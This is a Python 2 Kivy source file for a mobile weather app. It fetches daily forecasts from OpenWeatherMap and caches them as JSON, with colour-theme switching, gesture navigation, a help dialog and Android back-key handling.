from kivy.uix.widget import Widget
from kivy.graphics import Rectangle,Color
from kivy.garden.moretransitions import RippleTransition
from kivy.uix.popup import Popup
from kivy.properties import ObjectProperty, ListProperty, StringProperty, NumericProperty
from urllib import urlopen
from kivy.animation import Animation
import datetime
from os.path import exists
from kivy.graphics import Color, Ellipse, Line
from random import random
from kivy.utils import platform
from kivy.config import Config
#Loading files
Builder.load_file('./kv/StatusBar.kv')
Builder.load_file('./kv/Locations.kv')
Builder.load_file('./kv/Current.kv')
Builder.load_file('./kv/WholeWeek.kv')
Builder.load_file('./kv/calendar_part.kv')
Builder.load_file('./kv/months.kv')
Builder.load_file('./kv/dates.kv')
Builder.load_file('./kv/select.kv')
Builder.load_file('./kv/days.kv')
Builder.load_file('./kv/pingpong.kv')
if platform in ('android', 'ios') :
from plyer import orientation
#global variable
try:
variable_for_ping_pong_gesture = 0
name_file = open("./json/global_name.json","r")
getname = json.load(name_file)
except:
getname = 'Jaipur(IN)'
class HelpDialog(Popup):
rst = ObjectProperty(None)
def __init__(self,**kwargs):
super(HelpDialog,self).__init__(**kwargs)
self.rst = '''
Welcome
----------------------------
**How to use this application?**
Swipe left or right to view weather forecast. Search for new places, tap on them to view forecast for that region.
Use Navigation bar to change theme or to change areas.
Play Game or use calendar and navigate using gestures. Change theme. This application will remember all your choices like your theme and last search.
Features
---------------------------
**Gesture Recognition**
Draw these Symbols/characters.
- 'S' move to Settings area.
- 'C' move to Calendar area.
- 'W' move to Weather area.
- 'P' move to game area.
- '|' draw a line from top to bottom to refresh the application and get updated forecast.
**MordenMenu**
Give a long press on the screen to open up a wheel shaped menu with multiple options and navigate where ever you want.
You can also change the Theme of the application using this Menubar.
Click on center of the menu to go back.
**Navigation Bar**
Use Navigation bar to change theme or to navigate to different areas.
**Calendar**
Calendar which consists year from 0000 to 9999 and simple to use UI.
**Game**
There is a small Ping Pong game just for fun.
Developer
-----------------------
Kuldeep Singh, LNMIIT Jaipur, India
'''
class StatusBar(BoxLayout):
def connect(self):
self.parent.ids.status_label.text = "updating..."
threading.Thread(target=self.fourth_thread).start()
def fourth_thread(self):
config = MainApp.get_running_app().config
temp_type = config.getdefault("General", "temp_type", "metric").lower()
global getname
if temp_type == "metric":
self.temp_str = "C"
print "C"
elif temp_type == "imperial":
self.temp_str = "F"
print "F"
try:
url = urlopen('http://api.openweathermap.org/data/2.5/forecast/daily?q={}&mode=json&units={}'.format(getname,temp_type)).read()
result = json.loads(url)
print "starting"
self.out_file = open("./json/weather.json","w")
json.dump(result,self.out_file, indent=4)
self.out_file.close()
self.parent.ids.current.ids.location.text = str(result['city']['name'] +'('+ result['city']['country']+')')
self.parent.ids.current.ids.conditions.text = str(result['list'][0]['weather'][0]['description'])
self.parent.ids.wholeweek.ids.conditions1.text = str(result['list'][1]['weather'][0]['description'])
self.parent.ids.wholeweek.ids.conditions2.text = str(result['list'][2]['weather'][0]['description'])
self.parent.ids.wholeweek.ids.conditions3.text = str(result['list'][3]['weather'][0]['description'])
self.parent.ids.wholeweek.ids.conditions4.text = str(result['list'][4]['weather'][0]['description'])
self.parent.ids.current.ids.temp_min.text = str(result['list'][0]['temp']['min'])+' '+ self.temp_str
self.parent.ids.current.ids.temp_max.text = str(result['list'][0]['temp']['max'])+' '+ self.temp_str
self.parent.ids.wholeweek.ids.temp_min1.text = str(result['list'][1]['temp']['min'])+' '+ self.temp_str
self.parent.ids.wholeweek.ids.temp_max1.text = str(result['list'][1]['temp']['max'])+' '+ self.temp_str
self.parent.ids.wholeweek.ids.temp_min2.text = str(result['list'][2]['temp']['min'])+' '+ self.temp_str
self.parent.ids.wholeweek.ids.temp_max2.text = str(result['list'][2]['temp']['max'])+' '+ self.temp_str
self.parent.ids.wholeweek.ids.temp_min3.text = str(result['list'][3]['temp']['min'])+' '+ self.temp_str
self.parent.ids.wholeweek.ids.temp_max3.text = str(result['list'][3]['temp']['max'])+' '+ self.temp_str
self.parent.ids.wholeweek.ids.temp_min4.text = str(result['list'][4]['temp']['min'])+' '+ self.temp_str
self.parent.ids.wholeweek.ids.temp_max4.text = str(result['list'][4]['temp']['max'])+' '+ self.temp_str
self.parent.ids.current.ids.temperature.text = str(result['list'][0]['temp']['eve']) +' '+ self.temp_str
self.parent.ids.current.ids.conditions_image = "http://openweathermap.org/img/w/{}.png".format(result['list'][0]['weather'][0]['icon'])
self.parent.ids.wholeweek.ids.conditions_image1 = "http://openweathermap.org/img/w/{}.png".format(result['list'][1]['weather'][0]['icon'])
self.parent.ids.wholeweek.ids.conditions_image2 = "http://openweathermap.org/img/w/{}.png".format(result['list'][2]['weather'][0]['icon'])
self.parent.ids.wholeweek.ids.conditions_image3 = "http://openweathermap.org/img/w/{}.png".format(result['list'][3]['weather'][0]['icon'])
self.parent.ids.wholeweek.ids.conditions_image4 = "http://openweathermap.org/img/w/{}.png".format(result['list'][4]['weather'][0]['icon'])
print "made it"
try:
self.out_file = open("./json/global_name.json","w")
self.city_name = self.parent.ids.current.ids.location.text
json.dump(self.city_name,self.out_file, indent=4)
self.out_file.close()
except:
print "failed to load file"
self.parent.ids.status_label.text = "updated"
except:
traceback.print_exc()
self.in_file = open("./json/weather.json","r")
result = json.load(self.in_file)
self.parent.ids.current.ids.location.text = str(result['city']['name'] +'('+ result['city']['country']+')')
self.parent.ids.current.ids.conditions.text = str(result['list'][0]['weather'][0]['description'])
self.parent.ids.wholeweek.ids.conditions1.text = str(result['list'][1]['weather'][0]['description'])
self.parent.ids.wholeweek.ids.conditions2.text = str(result['list'][2]['weather'][0]['description'])
self.parent.ids.wholeweek.ids.conditions3.text = str(result['list'][3]['weather'][0]['description'])
self.parent.ids.wholeweek.ids.conditions4.text = str(result['list'][4]['weather'][0]['description'])
self.parent.ids.current.ids.temp_min.text = 'Low: '+str(result['list'][0]['temp']['min'])+' '+ self.temp_str
self.parent.ids.current.ids.temp_max.text = 'High: ' + str(result['list'][0]['temp']['max'])+' '+ self.temp_str
self.parent.ids.wholeweek.ids.temp_min1.text ='Low: '+ str(result['list'][1]['temp']['min'])+' '+ self.temp_str
self.parent.ids.wholeweek.ids.temp_max1.text = 'High: ' +str(result['list'][1]['temp']['max'])+' '+ self.temp_str
self.parent.ids.wholeweek.ids.temp_min2.text = 'Low: '+str(result['list'][2]['temp']['min'])+' '+ self.temp_str
self.parent.ids.wholeweek.ids.temp_max2.text = 'High: ' +str(result['list'][2]['temp']['max'])+' '+ self.temp_str
self.parent.ids.wholeweek.ids.temp_min3.text = 'Low: '+str(result['list'][3]['temp']['min'])+' '+ self.temp_str
self.parent.ids.wholeweek.ids.temp_max3.text = 'High: ' +str(result['list'][3]['temp']['max'])+' '+ self.temp_str
self.parent.ids.wholeweek.ids.temp_min4.text ='Low: '+ str(result['list'][4]['temp']['min'])+' '+ self.temp_str
self.parent.ids.wholeweek.ids.temp_max4.text = 'High: ' +str(result['list'][4]['temp']['max'])+' '+ self.temp_str
self.parent.ids.current.ids.temperature.text = str(result['list'][0]['temp']['eve']) +' '+ self.temp_str
self.parent.ids.current.ids.conditions_image = "./icons/wc0.png"
self.parent.ids.wholeweek.ids.conditions_image1 = "./icons/wc1.png"
self.parent.ids.wholeweek.ids.conditions_image2 = "./icons/wc2.png"
self.parent.ids.wholeweek.ids.conditions_image3 = "./icons/wc3.png"
self.parent.ids.wholeweek.ids.conditions_image4 = "./icons/wc4.png"
self.in_file.close()
self.parent.ids.status_label.text = "update failed"
def show_help(self, *args):
threading.Thread(target=self.sixth_thread).start()
def sixth_thread(self):
self.helpdialog = HelpDialog()
self.helpdialog.open()
class Locations(BoxLayout):
search_input = ObjectProperty()
search_results = ObjectProperty()
locationtext = ObjectProperty()
class LocationButton(ListItemButton):
location = ListProperty()
def update(self,*args):
threading.Thread(target=self.fifth_thread(args[0][0],args[0][1])).start()
def fifth_thread(self,*args):
config = MainApp.get_running_app().config
temp_type = config.getdefault("General", "temp_type", "metric").lower()
self.place = '{},{}'.format(args[0],args[1])
global getname
getname = self.place
#print self.place
if temp_type == "metric":
self.temp_str = "C"
elif temp_type == "imperial":
self.temp_str = "F"
try:
url = urlopen('http://api.openweathermap.org/data/2.5/forecast/daily?q={}&mode=json&units={}'.format(self.place,temp_type)).read()
result = json.loads(url)
print "starting"
self.parent.parent.load_next()
self.parent.parent.parent.parent.parent.ids.current.ids.location.text = str(result['city']['name'] +'('+ result['city']['country']+')')
self.parent.parent.parent.parent.parent.ids.current.ids.conditions.text = str(result['list'][0]['weather'][0]['description'])
self.parent.parent.parent.parent.parent.ids.wholeweek.ids.conditions1.text = str(result['list'][1]['weather'][0]['description'])
self.parent.parent.parent.parent.parent.ids.wholeweek.ids.conditions2.text = str(result['list'][2]['weather'][0]['description'])
self.parent.parent.parent.parent.parent.ids.wholeweek.ids.conditions3.text = str(result['list'][3]['weather'][0]['description'])
self.parent.parent.parent.parent.parent.ids.wholeweek.ids.conditions4.text = str(result['list'][4]['weather'][0]['description'])
self.parent.parent.parent.parent.parent.ids.current.ids.temp_min.text = str(result['list'][0]['temp']['min'])+' '+ self.temp_str
self.parent.parent.parent.parent.parent.ids.current.ids.temp_max.text = str(result['list'][0]['temp']['max'])+' '+ self.temp_str
self.parent.parent.parent.parent.parent.ids.wholeweek.ids.temp_min1.text = str(result['list'][1]['temp']['min'])+' '+ self.temp_str
self.parent.parent.parent.parent.parent.ids.wholeweek.ids.temp_max1.text = str(result['list'][1]['temp']['max'])+' '+ self.temp_str
self.parent.parent.parent.parent.parent.ids.wholeweek.ids.temp_min2.text = str(result['list'][2]['temp']['min'])+' '+ self.temp_str
self.parent.parent.parent.parent.parent.ids.wholeweek.ids.temp_max2.text = str(result['list'][2]['temp']['max'])+' '+ self.temp_str
self.parent.parent.parent.parent.parent.ids.wholeweek.ids.temp_min3.text = str(result['list'][3]['temp']['min'])+' '+ self.temp_str
self.parent.parent.parent.parent.parent.ids.wholeweek.ids.temp_max3.text = str(result['list'][3]['temp']['max'])+' '+ self.temp_str
self.parent.parent.parent.parent.parent.ids.wholeweek.ids.temp_min4.text = str(result['list'][4]['temp']['min'])+' '+ self.temp_str
self.parent.parent.parent.parent.parent.ids.wholeweek.ids.temp_max4.text = str(result['list'][4]['temp']['max'])+' '+ self.temp_str
self.parent.parent.parent.parent.parent.ids.current.ids.temperature.text = str(result['list'][0]['temp']['eve']) +' '+ self.temp_str
self.parent.parent.parent.parent.parent.ids.current.ids.conditions_image = "http://openweathermap.org/img/w/{}.png".format(result['list'][0]['weather'][0]['icon'])
self.parent.parent.parent.parent.parent.ids.wholeweek.ids.conditions_image1 = "http://openweathermap.org/img/w/{}.png".format(result['list'][1]['weather'][0]['icon'])
self.parent.parent.parent.parent.parent.ids.wholeweek.ids.conditions_image2 = "http://openweathermap.org/img/w/{}.png".format(result['list'][2]['weather'][0]['icon'])
self.parent.parent.parent.parent.parent.ids.wholeweek.ids.conditions_image3 = "http://openweathermap.org/img/w/{}.png".format(result['list'][3]['weather'][0]['icon'])
self.parent.parent.parent.parent.parent.ids.wholeweek.ids.conditions_image4 = "http://openweathermap.org/img/w/{}.png".format(result['list'][4]['weather'][0]['icon'])
self.out_file = open("./json/weather.json","w")
json.dump(result,self.out_file, indent=4)
self.out_file.close()
print "made it"
self.parent.parent.parent.parent.parent.ids.status_label.text = "updated"
except:
traceback.print_exc()
self.parent.parent.parent.parent.parent.ids.status_label.text = "update failed"
def search_location(self):
search_template = "http://api.openweathermap.org/data/2.5/find?q={}&type=like"
search_url = search_template.format(self.search_input.text)
print self.search_input.text
#@param URL, method(request, response) to be called upon response
request = UrlRequest(search_url, self.found_location)
def found_location(self, request, response):
try:
response = json.loads(response.decode()) if not isinstance(response, dict) else response
#Fix_Ends
#print response
if response != {u'message': u'', u'cod': u'404'}:
if response != {u'count': 0, u'message': u'like', u'list': [], u'cod': u'200'}:
#change cities from list of string to list of tuples for easier processing while retriving data specific to the location
cities = [(d['name'], d['sys']['country']) for d in response['list']]
self.search_results.item_strings = cities
#the container involved is ObservableList so clear it
#self.search_results.adapter.data.clear()
#clear() on list is not available in python 2 so use
del self.search_results.adapter.data[:]
#donot delete list like this data = [] as it would assign normal list instead of ObservableList
#extend with new data
self.search_results.adapter.data.extend(cities)
#ListAdapter should update display when it sees data change but it ain't doing it, so force the update
self.search_results._trigger_reset_populate()
else:
self.search_input.text = "No results found"
else:
self.search_input.text = "No results found"
except:
self.search_input.text = "Didn't receive any response"
self.parent.parent.parent.parent.parent.ids.status_label.text = "update failed"
def args_converter(self,index, data_item):
#index -> index of the item in list
#data_item -> value
city, country = data_item
print city,country
self.locationtext = "{}({})".format(city,country)
#return value should be a dictionary of properties with their value
#in this case the property location is set to the tuple
#however since location is defined as ListProperty the tuple will be automatically converted into List
return {'location': (city, country)}
class Current(BoxLayout):
location = StringProperty()
conditions = StringProperty()
temp = NumericProperty()
temp_min = NumericProperty()
temp_max = NumericProperty()
conditions_image = ObjectProperty()
temp_str = StringProperty()
two = ObjectProperty(None)
def __init__(self,**kwargs):
super(Current,self).__init__(**kwargs)
threading.Thread(target=self.second_thread).start()
try:
self.in_file = open("./json/weather.json","r")
result = json.load(self.in_file)
self.conditions = result['list'][0]['weather'][0]['description']
self.temp_min = result['list'][0]['temp']['min']
self.temp_max = result['list'][0]['temp']['max']
self.temp = result['list'][0]['temp']['eve']
self.conditions_image = "./icons/wc0.png"
self.location = result['city']['name'] +'('+ result['city']['country']+')'
self.in_file.close()
except:
traceback.print_exc()
def second_thread(self):
config = MainApp.get_running_app().config
temp_type = config.getdefault("General", "temp_type", "metric").lower()
if temp_type == "metric":
self.temp_str = "C"
print "C"
elif temp_type == "imperial":
self.temp_str = "F"
print "F"
try:
global getname
print getname
print "____get_namne_here"
url = urlopen('http://api.openweathermap.org/data/2.5/forecast/daily?q={}&mode=json&units={}'.format(getname,temp_type)).read()
result = json.loads(url)
self.location = result['city']['name'] +'('+ result['city']['country']+')'
self.conditions = result['list'][0]['weather'][0]['description']
self.conditions_image = "http://openweathermap.org/img/w/{}.png".format(result['list'][0]['weather'][0]['icon'])
response0 = requests.get(self.conditions_image)
if response0.status_code == 200:
f = open("./icons/wc0.png", 'wb')
f.write(response0.content)
print "saving image 0"
f.close()
self.temp_min = result['list'][0]['temp']['min']
self.temp_max = result['list'][0]['temp']['max']
self.temp = result['list'][0]['temp']['eve']
self.parent.parent.parent.parent.parent.ids.status_label.text = "updated"
except:
traceback.print_exc()
print "fails"
self.parent.parent.parent.parent.parent.ids.status_label.text = "update failed"
class WholeWeek(BoxLayout):
location = StringProperty()
conditions = StringProperty()
temp = NumericProperty()
temp_min = NumericProperty()
temp_max = NumericProperty()
conditions_image = ObjectProperty()
temp_str = StringProperty()
whole = ['Monday','Tuesday','Wednesday','Thursday','Friday','Saturday','Sunday','Monday','Tuesday','Wednesday','Thursday']
now = datetime.datetime.now()
today = whole.index(now.strftime("%A"))
day1 = StringProperty(whole[today+1])
day2 = StringProperty(whole[today+2])
day3 = StringProperty(whole[today+3])
day4 = StringProperty(whole[today+4])
conditions1 = StringProperty()
temp_min1 = NumericProperty()
temp_max1 = NumericProperty()
conditions_image1 = StringProperty()
conditions2 = StringProperty()
temp_min2 = NumericProperty()
temp_max2 = NumericProperty()
conditions_image2 = StringProperty()
conditions3 = StringProperty()
temp_min3 = NumericProperty()
temp_max3 = NumericProperty()
conditions_image3 = StringProperty()
conditions4 = StringProperty()
temp_min4 = NumericProperty()
temp_max4 = NumericProperty()
conditions_image4 = StringProperty()
def __init__(self,**kwargs):
super(WholeWeek,self).__init__(**kwargs)
threading.Thread(target=self.third_thread).start()
try:
self.in_file = open("./json/weather.json","r")
result = json.load(self.in_file)
self.conditions1 = result['list'][1]['weather'][0]['description']
self.conditions2 = result['list'][2]['weather'][0]['description']
self.conditions3 = result['list'][3]['weather'][0]['description']
self.conditions4 = result['list'][4]['weather'][0]['description']
self.temp_min1 = result['list'][1]['temp']['min']
self.temp_max1 = result['list'][1]['temp']['max']
self.temp_min2 = result['list'][2]['temp']['min']
self.temp_max2 = result['list'][2]['temp']['max']
self.temp_min3 = result['list'][3]['temp']['min']
self.temp_max3 = result['list'][3]['temp']['max']
self.temp_min4 = result['list'][4]['temp']['min']
self.temp_max4 = result['list'][4]['temp']['max']
self.conditions_image = "./icons/wc0.png"
self.conditions_image1 = "./icons/wc1.png"
self.conditions_image2 = "./icons/wc2.png"
self.conditions_image3 = "./icons/wc3.png"
self.conditions_image4 = "./icons/wc4.png"
self.in_file.close()
except:
traceback.print_exc()
def third_thread(self):
config = MainApp.get_running_app().config
temp_type = config.getdefault("General", "temp_type", "metric").lower()
if temp_type == "metric":
self.temp_str = "C"
print "C"
elif temp_type == "imperial":
self.temp_str = "F"
print "F"
try:
global getname
url = urlopen('http://api.openweathermap.org/data/2.5/forecast/daily?q={}&mode=json&units={}'.format(getname,temp_type)).read()
result = json.loads(url)
self.out_file = open("./json/weather.json","w")
json.dump(result,self.out_file, indent=4)
self.out_file.close()
print "came here"
#self.location = result['city']['name'] +'('+ result['city']['country']+')'
#self.parent.ids.current.ids.conditions = result['list'][0]['weather'][0]['description']
#self.parent.ids.current.ids.conditions_image = "http://openweathermap.org/img/w/{}.png".format(result['list'][0]['weather'][0]['icon'])
self.conditions_image1 = "http://openweathermap.org/img/w/{}.png".format(result['list'][1]['weather'][0]['icon'])
self.conditions_image2 = "http://openweathermap.org/img/w/{}.png".format(result['list'][2]['weather'][0]['icon'])
self.conditions_image3 = "http://openweathermap.org/img/w/{}.png".format(result['list'][3]['weather'][0]['icon'])
self.conditions_image4 = "http://openweathermap.org/img/w/{}.png".format(result['list'][4]['weather'][0]['icon'])
response1 = requests.get(self.conditions_image1)
response2 = requests.get(self.conditions_image2)
response3 = requests.get(self.conditions_image3)
response4 = requests.get(self.conditions_image4)
if response1.status_code == 200:
f = open("./icons/wc1.png", 'wb')
f.write(response1.content)
print "saving image 1"
f.close()
if response2.status_code == 200:
f = open("./icons/wc2.png", 'wb')
f.write(response2.content)
print "saving image 2"
f.close()
if response3.status_code == 200:
f = open("./icons/wc3.png", 'wb')
f.write(response3.content)
print "saving image 3"
f.close()
if response4.status_code == 200:
f = open("./icons/wc4.png", 'wb')
f.write(response4.content)
print "saving image 4"
f.close()
#self.parent.ids.current.ids.temp_min = result['list'][0]['temp']['min']
#self.parent.ids.current.ids.temp_max = result['list'][0]['temp']['max']
self.conditions1 = result['list'][1]['weather'][0]['description']
self.conditions2 = result['list'][2]['weather'][0]['description']
self.conditions3 = result['list'][3]['weather'][0]['description']
self.conditions4 = result['list'][4]['weather'][0]['description']
self.temp_min1 = result['list'][1]['temp']['min']
self.temp_max1 = result['list'][1]['temp']['max']
self.temp_min2 = result['list'][2]['temp']['min']
self.temp_max2 = result['list'][2]['temp']['max']
self.temp_min3 = result['list'][3]['temp']['min']
self.temp_max3 = result['list'][3]['temp']['max']
self.temp_min4 = result['list'][4]['temp']['min']
self.temp_max4 = result['list'][4]['temp']['max']
#self.parent.ids.current.ids.temp = result['list'][0]['temp']['eve']
print "made it"
print self.parent.parent.parent.parent.parent.ids
self.parent.parent.parent.parent.parent.ids.status_label.text = "updated"
except:
traceback.print_exc()
print self.parent.parent
self.parent.parent.parent.parent.parent.ids.status_label.text = "update failed"
class History(BoxLayout):
pass
class Together(gesture.GestureBox):
theme = StringProperty('')
theme = StringProperty('')
theme0 = NumericProperty()
theme1 = NumericProperty()
theme2 = NumericProperty('')
theme3 = NumericProperty('')
def __init__(self,**kwargs):
super(Together,self).__init__(**kwargs)
in_file = open("./json/theme.json","r")
self.theme =json.load(in_file)['theme']
self.theme0 = float(self.theme.split(',')[0])
self.theme1 = float(self.theme.split(',')[1])
self.theme2 = float(self.theme.split(',')[2])
self.theme3 = float(self.theme.split(',')[3])
in_file.close()
def on_touch_down(self, touch):
try:
gesture.GestureBox.on_touch_down(self, touch)
color = (random(), 1, 1)
with self.canvas:
Color(*color, mode='hsv')
touch.ud['line'] = Line(points=(touch.x, touch.y),width = 5)
except:
pass
def on_touch_move(self, touch):
try:
gesture.GestureBox.on_touch_move(self, touch)
if self.ids.manager.current == "game":
touch.ud['line'].points = []
else:
touch.ud['line'].points += [touch.x, touch.y]
except:
pass
class User(BoxLayout):
def callback1(self, *args):
out_file = open("./json/theme.json","w")
theme = {'theme': '.266,.423,.701,1'}
json.dump(theme,out_file, indent=4)
out_file.close()
with args[0].parent.parent.parent.parent.parent.parent.parent.parent.parent.ids.together.canvas.before:
Color(rgba = (.266,.423,.701,1)),
Rectangle(pos=(args[0].parent.parent.parent.parent.parent.parent.parent.parent.parent.ids.together.pos[0]-200,args[0].parent.parent.parent.parent.parent.parent.parent.parent.parent.ids.together.pos[1]-200),
size=(max(args[0].parent.parent.parent.parent.parent.parent.parent.parent.parent.ids.together.size)+500,max(args[0].parent.parent.parent.parent.parent.parent.parent.parent.parent.ids.together.size)+500))
def callback2(self, *args):
out_file = open("./json/theme.json","w")
theme = {'theme': '.839,.270,.254,1'}
json.dump(theme,out_file, indent=4)
out_file.close()
with args[0].parent.parent.parent.parent.parent.parent.parent.parent.parent.ids.together.canvas.before:
Color(rgba = (.839,.270,.254,1)),
Rectangle(pos=(args[0].parent.parent.parent.parent.parent.parent.parent.parent.parent.ids.together.pos[0]-200,args[0].parent.parent.parent.parent.parent.parent.parent.parent.parent.ids.together.pos[1]-200),
size=(max(args[0].parent.parent.parent.parent.parent.parent.parent.parent.parent.ids.together.size)+500,max(args[0].parent.parent.parent.parent.parent.parent.parent.parent.parent.ids.together.size)+500))
def callback3(self, *args):
out_file = open("./json/theme.json","w")
theme = {'theme': '.749,.333,.925,1'}
json.dump(theme,out_file, indent=4)
out_file.close()
with args[0].parent.parent.parent.parent.parent.parent.parent.parent.parent.ids.together.canvas.before:
Color(rgba = (.749,.333,.925,1)),
Rectangle(pos=(args[0].parent.parent.parent.parent.parent.parent.parent.parent.parent.ids.together.pos[0]-200,args[0].parent.parent.parent.parent.parent.parent.parent.parent.parent.ids.together.pos[1]-200),
size=(max(args[0].parent.parent.parent.parent.parent.parent.parent.parent.parent.ids.together.size)+500,max(args[0].parent.parent.parent.parent.parent.parent.parent.parent.parent.ids.together.size)+500))
def callback4(self, *args):
out_file = open("./json/theme.json","w")
theme = {'theme': '.2,.431,.482,1'}
json.dump(theme,out_file, indent=4)
out_file.close()
with args[0].parent.parent.parent.parent.parent.parent.parent.parent.parent.ids.together.canvas.before:
Color(rgba = (.2,.431,.482,1)),
Rectangle(pos=(args[0].parent.parent.parent.parent.parent.parent.parent.parent.parent.ids.together.pos[0]-200,args[0].parent.parent.parent.parent.parent.parent.parent.parent.parent.ids.together.pos[1]-200),
size=(max(args[0].parent.parent.parent.parent.parent.parent.parent.parent.parent.ids.together.size)+500,max(args[0].parent.parent.parent.parent.parent.parent.parent.parent.parent.ids.together.size)+500))
def callback5(self, *args):
out_file = open("./json/theme.json","w")
theme = {'theme': '.149,.560,.356,1'}
json.dump(theme,out_file, indent=4)
out_file.close()
with args[0].parent.parent.parent.parent.parent.parent.parent.parent.parent.ids.together.canvas.before:
Color(rgba = (.149,.560,.356,1)),
Rectangle(pos=(args[0].parent.parent.parent.parent.parent.parent.parent.parent.parent.ids.together.pos[0]-200,args[0].parent.parent.parent.parent.parent.parent.parent.parent.parent.ids.together.pos[1]-200),
size=(max(args[0].parent.parent.parent.parent.parent.parent.parent.parent.parent.ids.together.size)+500,max(args[0].parent.parent.parent.parent.parent.parent.parent.parent.parent.ids.together.size)+500))
def callback6(self, *args):
out_file = open("./json/theme.json","w")
theme = {'theme': '.949,.470,.294,1'}
json.dump(theme,out_file, indent=4)
out_file.close()
with args[0].parent.parent.parent.parent.parent.parent.parent.parent.parent.ids.together.canvas.before:
Color(rgba = (.949,.470,.294,1)),
Rectangle(pos=(args[0].parent.parent.parent.parent.parent.parent.parent.parent.parent.ids.together.pos[0]-200,args[0].parent.parent.parent.parent.parent.parent.parent.parent.parent.ids.together.pos[1]-200),
size=(max(args[0].parent.parent.parent.parent.parent.parent.parent.parent.parent.ids.together.size)+500,max(args[0].parent.parent.parent.parent.parent.parent.parent.parent.parent.ids.together.size)+500))
def callback7(self, *args):
out_file = open("./json/theme.json","w")
theme = {'theme': '.423,.478,.537,1'}
json.dump(theme,out_file, indent=4)
out_file.close()
with args[0].parent.parent.parent.parent.parent.parent.parent.parent.parent.ids.together.canvas.before:
Color(rgba = (.423,.478,.537,1)),
Rectangle(pos=(args[0].parent.parent.parent.parent.parent.parent.parent.parent.parent.ids.together.pos[0]-200,args[0].parent.parent.parent.parent.parent.parent.parent.parent.parent.ids.together.pos[1]-200),
size=(max(args[0].parent.parent.parent.parent.parent.parent.parent.parent.parent.ids.together.size)+500,max(args[0].parent.parent.parent.parent.parent.parent.parent.parent.parent.ids.together.size)+500))
def callback8(self, *args):
out_file = open("./json/theme.json","w")
theme = {'theme': '.323,.7,.2,1'}
json.dump(theme,out_file, indent=4)
out_file.close()
with args[0].parent.parent.parent.parent.parent.parent.parent.parent.parent.ids.together.canvas.before:
Color(rgba = (.323,.7,.2,1)),
Rectangle(pos=(args[0].parent.parent.parent.parent.parent.parent.parent.parent.parent.ids.together.pos[0]-200,args[0].parent.parent.parent.parent.parent.parent.parent.parent.parent.ids.together.pos[1]-200),
size=(max(args[0].parent.parent.parent.parent.parent.parent.parent.parent.parent.ids.together.size)+500,max(args[0].parent.parent.parent.parent.parent.parent.parent.parent.parent.ids.together.size)+500))
def callback9(self, *args):
out_file = open("./json/theme.json","w")
theme = {'theme': '.323,.1,.32,1'}
json.dump(theme,out_file, indent=4)
out_file.close()
with args[0].parent.parent.parent.parent.parent.parent.parent.parent.parent.ids.together.canvas.before:
Color(rgba = (.323,.1,.32,1)),
Rectangle(pos=(args[0].parent.parent.parent.parent.parent.parent.parent.parent.parent.ids.together.pos[0]-200,args[0].parent.parent.parent.parent.parent.parent.parent.parent.parent.ids.together.pos[1]-200),
size=(max(args[0].parent.parent.parent.parent.parent.parent.parent.parent.parent.ids.together.size)+500,max(args[0].parent.parent.parent.parent.parent.parent.parent.parent.parent.ids.together.size)+500))
from kivy.clock import Clock
from kivy.properties import BooleanProperty
if platform == "android":
import android
from jnius import autoclass, cast
from android.runnable import run_on_ui_thread
Toast = autoclass("android.widget.Toast")
from jnius import autoclass
# Context is a normal java class in the Android API
Context = autoclass('android.content.Context')
# PythonActivity is provided by the Kivy bootstrap app in python-for-android
PythonActivity = autoclass('org.renpy.android.PythonActivity')
# The PythonActivity stores a reference to the currently running activity
# We need this to access the vibrator service
#activity = PythonActivity.mActivity
class MainApp(App):
exitnext = BooleanProperty(False)
use_kivy_settings = False
def __init__(self, *args, **kwargs):
super(MainApp, self).__init__(*args, **kwargs)
def build(self):
if platform == "android":
self.bind(on_start=self.post_build_init)
return User()
if platform == "android":
@run_on_ui_thread
def toast(self, text, duration):
# Duration is either 0 = short = 2 sec, or 1 = long = 3.5 sec
String = autoclass('java.lang.String')
c = cast('java.lang.CharSequence', String(text))
context = PythonActivity.mActivity.getApplicationContext()
t = Toast.makeText(context, c, duration)
t.show()
return t
else:
pass
def post_build_init(self, *args):
# Map Android keys
if platform == 'android':
android.map_key(android.KEYCODE_BACK, 1000)
android.map_key(android.KEYCODE_MENU, 1001)
win = self._app_window
win.bind(on_keyboard=self._key_handler)
def _key_handler(self, *args):
key = args[1]
# Escape or Android's back key
if key in (1000, 27):
self.hide_kbd_or_exit()
return True
def hide_kbd_or_exit(self, *args):
if platform == "android" and not self.exitnext:
android.hide_keyboard()
self.exitnext = True
Clock.schedule_once(lambda *args: setattr(self, "exitnext", False), 2)
self.toast(("Press Back again to exit"), 0)
else:
self.stop()
def build_config(self, config):
config.setdefaults('General', {'temp_type': "Metric"})
def build_settings(self, settings):
#param --> title, always self.config, filename or JSON data
settings.add_json_panel("Weather Settings", self.config, data="""
[
{"type": "options",
"title": "Temperature System",
"section": "General",
"key": "temp_type",
"options": ["Metric", "Imperial"]
}
]""")
def on_config_change(self, config, section, key, value):
if config is self.config and key == "temp_type":
try:
self.root.children[0].update_weather()
#current root window has no update_weather method
except AttributeError:
pass
def on_pause(self):
return True
def on_resume(self):
pass
def on_touch_down(self,touch):
pass
def callback1(self, *args):
args[0].parent.open_submenu(
choices=[
dict(text='Theme 1', index=1, callback=self.callback2),
dict(text='Theme 2', index=2, callback=self.callback3),
dict(text='Theme 3', index=3, callback=self.callback7),
dict(text='Theme 4', index=4, callback=self.callback8),
dict(text='Theme 5', index=5, callback=self.callback9),
])
def callback4(self,*args):
args[0].parent.open_submenu(
choices=[
dict(text='Theme 6', index=1, callback=self.callback10),
dict(text='Theme 7', index=2, callback=self.callback11),
dict(text='Theme 8', index=3, callback=self.callback12),
dict(text='Theme 9', index=4, callback=self.callback13),
])
def callback2(self, *args):
print args[0]
out_file = open("./json/theme.json","w")
theme = {'theme': '.266,.423,.701,1'}
json.dump(theme,out_file, indent=4)
out_file.close()
with args[0].parent.parent.parent.canvas.before:
Color(rgba = (.266,.423,.701,1)),
Rectangle(pos=args[0].parent.parent.parent.pos, size=(max(args[0].parent.parent.parent.size)+200,max(args[0].parent.parent.parent.size)+200))
def callbackabout(self, *args):
args[0].parent.parent.parent.ids.manager.current = 'about'
args[0].parent.dismiss()
def callback3(self, *args):
out_file = open("./json/theme.json","w")
theme = {'theme': '.839,.270,.254,1'}
json.dump(theme,out_file, indent=4)
out_file.close()
with args[0].parent.parent.parent.canvas.before:
Color(rgba = (.839,.270,.254,1)),
Rectangle(pos=args[0].parent.parent.parent.pos, size=(max(args[0].parent.parent.parent.size)+200,max(args[0].parent.parent.parent.size)+200))
def callback7(self, *args):
out_file = open("./json/theme.json","w")
theme = {'theme': '.749,.333,.925,1'}
json.dump(theme,out_file, indent=4)
out_file.close()
